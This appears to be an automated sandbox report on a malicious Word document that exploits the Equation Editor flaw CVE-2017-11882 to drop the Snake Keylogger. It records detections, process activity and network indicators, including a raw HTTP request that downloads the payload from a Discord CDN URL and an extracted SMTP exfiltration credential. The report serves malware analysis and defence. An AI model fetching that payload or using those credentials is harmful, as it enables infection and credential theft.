Loading ...

Play interactive tourEdit tour

Analysis Report COMPANY REQUIREMENT.doc

Overview

General Information

Sample Name:COMPANY REQUIREMENT.doc
Analysis ID:367982
MD5:ab8c927fef01c470fe7206a0b043d763
SHA1:c9420088ea76d0bfdb831d244f248c172eee69fb
SHA256:fd2198f7abdbeaa61d74b78a67eca916ed8297a4889680529ee86a27ca860bdd
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AntiVM_3
Yara detected Snake Keylogger
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1976 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2556 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hbmaqbo.exe (PID: 824 cmdline: C:\Users\user\AppData\Roaming\hbmaqbo.exe MD5: 9B568603BDDF210CA155C59A846E206A)
      • hbmaqbo.exe (PID: 2928 cmdline: {path} MD5: 9B568603BDDF210CA155C59A846E206A)
  • EQNEDT32.EXE (PID: 2876 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "chidimobility@vespang.cfHanna.2020vespang.cf"}}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
    00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
        00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Process Memory Space: hbmaqbo.exe PID: 2928JoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.hbmaqbo.exe.400000.0.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
              5.2.hbmaqbo.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                4.2.hbmaqbo.exe.3a2c368.4.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                  4.2.hbmaqbo.exe.3a2c368.4.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                    4.2.hbmaqbo.exe.3a2c368.4.raw.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hbmaqbo.exe, CommandLine: C:\Users\user\AppData\Roaming\hbmaqbo.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hbmaqbo.exe, NewProcessName: C:\Users\user\AppData\Roaming\hbmaqbo.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hbmaqbo.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Users\user\AppData\Roaming\hbmaqbo.exe, ProcessId: 824
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.159.135.233, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2556, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harcout[1].exe

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "chidimobility@vespang.cfHanna.2020vespang.cf"}}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\harcout[1].exeReversingLabs: Detection: 23%
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeReversingLabs: Detection: 23%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: COMPANY REQUIREMENT.docVirustotal: Detection: 45%Perma Link
                      Source: COMPANY REQUIREMENT.docReversingLabs: Detection: 51%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\harcout[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeJoe Sandbox ML: detected
                      Source: 5.2.hbmaqbo.exe.400000.0.unpackAvira: Label: TR/Spy.Gen

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hbmaqbo.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49166 version: TLS 1.2
                      Source: global trafficDNS query: name: cdn.discordapp.com
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 162.159.135.233:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.135.233:80

                      Networking:

                      barindex
                      May check the online IP address of the machineShow sources
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: Joe Sandbox ViewIP Address: 131.186.161.70 131.186.161.70
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /attachments/819674896988242004/819677189900861500/harcout.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.22:49169 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E979737-30AB-4901-9D2A-3CE504568F55}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /attachments/819674896988242004/819677189900861500/harcout.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: hbmaqbo.exe, 00000005.00000002.2340179082.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: hbmaqbo.exe, 00000005.00000002.2340179082.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://checkip.dyndns.orgP
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: hbmaqbo.exe, 00000005.00000002.2339705547.00000000006DB000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: http://freegeoip.app
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: hbmaqbo.exe, 00000005.00000002.2341268145.0000000004EE0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: hbmaqbo.exe, 00000005.00000002.2340179082.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: hbmaqbo.exe, 00000005.00000002.2341268145.0000000004EE0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: hbmaqbo.exe, 00000005.00000002.2340179082.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmp, hbmaqbo.exe, 00000005.00000002.2339705547.00000000006DB000.00000004.00000020.sdmpString found in binary or memory: https://freegeoip.app/xml/84.17.52.78
                      Source: hbmaqbo.exe, 00000005.00000002.2340179082.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.app/xml/LoadCountryNameClipboard
                      Source: hbmaqbo.exe, 00000005.00000002.2340216198.0000000002817000.00000004.00000001.sdmpString found in binary or memory: https://freegeoip.appP
                      Source: hbmaqbo.exe, 00000005.00000002.2340250795.0000000002848000.00000004.00000001.sdmp, hbmaqbo.exe, 00000005.00000002.2340244978.0000000002844000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: hbmaqbo.exe, 00000005.00000002.2339720875.0000000000703000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: hbmaqbo.exe, harcout[1].exe0.2.drString found in binary or memory: https://unsplash.it/
                      Source: hbmaqbo.exe, 00000005.00000002.2341756463.000000000616F000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49166 version: TLS 1.2

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\harcout[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hbmaqbo.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036017C4_2_0036017C
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036D9624_2_0036D962
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003649884_2_00364988
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003655D14_2_003655D1
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00363A184_2_00363A18
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036A2084_2_0036A208
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00366ED84_2_00366ED8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00365FB94_2_00365FB9
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036DBF04_2_0036DBF0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00362BE84_2_00362BE8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036A4334_2_0036A433
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003694904_2_00369490
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003694804_2_00369480
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00363D744_2_00363D74
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036AD724_2_0036AD72
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003689504_2_00368950
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003689424_2_00368942
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036BDA04_2_0036BDA0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036BD904_2_0036BD90
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036AD804_2_0036AD80
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00367DF04_2_00367DF0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00366DE04_2_00366DE0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00367DE04_2_00367DE0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036B5DA4_2_0036B5DA
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003692184_2_00369218
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036A2044_2_0036A204
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003692094_2_00369209
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036D6404_2_0036D640
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003696B04_2_003696B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036A2B94_2_0036A2B9
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036BAE04_2_0036BAE0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036A7224_2_0036A722
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036C3B44_2_0036C3B4
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00368FE04_2_00368FE0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036DBE04_2_0036DBE0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_003607E84_2_003607E8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00368FD14_2_00368FD1
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_0036C3D84_2_0036C3D8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 4_2_00362BCB4_2_00362BCB
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E91105_2_001E9110
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E05B05_2_001E05B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E89185_2_001E8918
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E99085_2_001E9908
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E7AB05_2_001E7AB0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001EDC425_2_001EDC42
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E6D685_2_001E6D68
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E10695_2_001E1069
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E90B05_2_001E90B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E82935_2_001E8293
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E64A05_2_001E64A0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E15805_2_001E1580
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E88B95_2_001E88B9
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E98A85_2_001E98A8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E6D095_2_001E6D09
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_001E5EA75_2_001E5EA7
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038D0385_2_0038D038
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038D8205_2_0038D820
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038E0085_2_0038E008
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038C8C05_2_0038C8C0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038C1105_2_0038C110
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003895B05_2_003895B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00387DF85_2_00387DF8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00389DE85_2_00389DE8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003885E05_2_003885E0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038A5D05_2_0038A5D0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00388DC85_2_00388DC8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00386E285_2_00386E28
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003876105_2_00387610
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003856705_2_00385670
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00385E585_2_00385E58
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003866405_2_00386640
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00383EB85_2_00383EB8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003846A05_2_003846A0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00384E885_2_00384E88
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00382F385_2_00382F38
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003837205_2_00383720
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00381F685_2_00381F68
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003827505_2_00382750
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003807B05_2_003807B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00380F985_2_00380F98
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038AF885_2_0038AF88
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003817805_2_00381780
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038E7F05_2_0038E7F0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038EFD85_2_0038EFD8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038F7C05_2_0038F7C0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038C8105_2_0038C810
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038C0605_2_0038C060
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00389D395_2_00389D39
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_0038A5705_2_0038A570
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00388D675_2_00388D67
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003895505_2_00389550
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003875B05_2_003875B0
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00387D985_2_00387D98
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003885805_2_00388580
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00385DF85_2_00385DF8
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_003865E15_2_003865E1
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00386DC75_2_00386DC7
                      Source: C:\Users\user\AppData\Roaming\hbmaqbo.exeCode function: 5_2_00384E295_2_00384E29
